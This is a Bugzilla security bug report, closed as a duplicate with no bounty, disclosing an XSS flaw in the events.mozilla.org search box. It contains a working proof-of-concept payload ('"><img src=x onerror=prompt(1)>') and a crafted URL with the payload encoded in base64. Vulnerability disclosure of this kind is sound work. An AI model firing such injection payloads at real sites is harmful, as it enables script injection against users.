XSS at search box events.mozilla.org

RESOLVED DUPLICATE of bug 1142658

Status

Websites
Other
RESOLVED DUPLICATE of bug 1142658
5 months ago
5 months ago

People

(Reporter: Nur A Alam Dipu, Unassigned)

Tracking

unspecified
Bug Flags:
sec-bounty -

Details

Attachments

(1 attachment)

(Reporter)

Description

5 months ago
Created attachment 8870775 [details]
xss-mozila.png

User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36

Steps to reproduce:

Hi,

There is xss in seach box.
URL:
https://events.mozilla.org/portal/events/#search/advanced/eyJkIjpbMjMsMSwxNF0sImUiOlswLDQsMl0sImYiOlswLDAsMF0sImciOlszMjAsIlwiPjxpbWcgc3JjPXggb25lcnJvcj1wcm9tcHQoMSk+IiwiXCI+PGltZyBzcmM9eCBvbmVycm9yPXByb21wdCgxKT4iXSwiaCI6WyIiLCIiLCIiXSwiaSI6WyIiLCIiLCIiXX0=


Actual results:

playlaod:
"><img src=x onerror=prompt(1)>


Expected results:

Put playloads in search box.
It will triggered xss pop up.

Updated

5 months ago
Group: core-security
Status: UNCONFIRMED → RESOLVED
Last Resolved: 5 months ago
Component: Untriaged → Other
Flags: sec-bounty-
Product: Core → Websites
Resolution: --- → DUPLICATE
Version: 50 Branch → unspecified
Duplicate of bug: 1142658
You need to log in before you can comment on or make changes to this bug.